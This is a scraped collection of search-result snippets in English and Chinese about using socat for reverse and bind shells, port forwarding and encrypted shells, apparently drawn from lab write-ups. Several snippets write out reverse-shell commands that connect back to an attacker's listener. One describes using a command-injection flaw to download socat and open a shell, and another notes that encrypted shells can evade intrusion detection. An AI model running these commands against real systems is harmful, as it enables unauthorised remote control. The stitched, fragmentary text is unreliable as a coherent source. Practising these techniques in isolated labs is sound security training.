2024年12月1日 · Practice reverse and bind shells using Socat on the Linux machine. Try both the normal and special techniques. It is time for some Socat! Reverse shell: Start by making a simple listener on the attacker machine: socat TCP-L:<port> - Followed by connecting back from the target machine: socat TCP:<LOCAL-IP>:<LOCAL-PORT> EXEC:”bash -li” Bind ...

One of the many great things about socat is that it's capable of creating encrypted shells -- both bind and reverse. Why would we want to do this? Encrypted shells cannot be spied on unless you have the decryption key, and are often able to bypass an IDS as a result.

使用 socat 需要提供两个地址，然后 socat 做的事情就是把这两个地址的数据流串起来，把第左边地址的输出数据传给右边，同时又把右边输出的数据传到左边。

2017年7月10日 · With a command injection vuln, it’s possible to download the correct architecture socat binary to a writable directoy, chmod it, then execute a reverse shell in one line: On Kali, you’ll catch a fully interactive TTY session. It supports tab-completion, SIGINT/SIGSTP support, vim, up arrow history, etc. It’s a full terminal. Pretty sweet.

2025年1月17日 · Learn how to use socat for different purposes in ethical hacking in our guide made for absolute beginners.

2020年4月21日 · Socat是一个两个独立数据通道之间的双向数据传输的继电器。这些数据通道包含文件、管道、设备（终端或调制解调器等）、插座（Unix，IP4，IP6 - raw，UDP，TCP）、SSL、SOCKS4客户端或代理CONNECT。 Socat支持广播和多播、抽象Unix sockets、Linux tun/tap、GNU readline 和 PTY。

2021年7月30日 · Let’s take an example, Socat can be used as a TCP port forwarder, as an external socksifier, for attacking weak firewalls, as a shell interface to UNIX sockets or an IP6 relay, for redirecting TCP oriented programs to a serial line, or to logically connect serial lines on different computers, as well as to establish a secure environment for ...

13.4 Practice reverse and bind shells using Socat on the Linux machine. Try both the normal and special techniques. SOCAT REVERSE SHELL. run below command on attacker’s terminal to start a socat listener . socat TCP-L:4444 - run below command on target’s terminal to connect back to socat listener . socat TCP:<tun0-ip>:4444 EXEC:"bash -li"

##### tags: `network technology` # socat 常用用法 ### 連接遠端 port ```bash= socat - TCP:192.168.1.200:4444 # 跟 nc 192.168.1.200 4444 同理 ``` ### 監聽 port ```bash= socat TCP-LISTEN:4444 - # 跟 nc -lp 4444 同理 ``` ### port 轉發 (TCP) ```bash= socat -d -d -lf /tmp/socat.log TCP4-LISTEN:4444,bind=127.0.0.1,reuseaddr,fork TCP4:120.117.130.202:80 # 兩次 -d 代表調整 …

How to get out, back in or ... simply let everyone in ... without being detected ! This is for education only and should not be used for any illegal, hacking or other activity that might cause harm or damage of any kind. Only try this in an isolated lab environment to prevent accidental exposing of network services.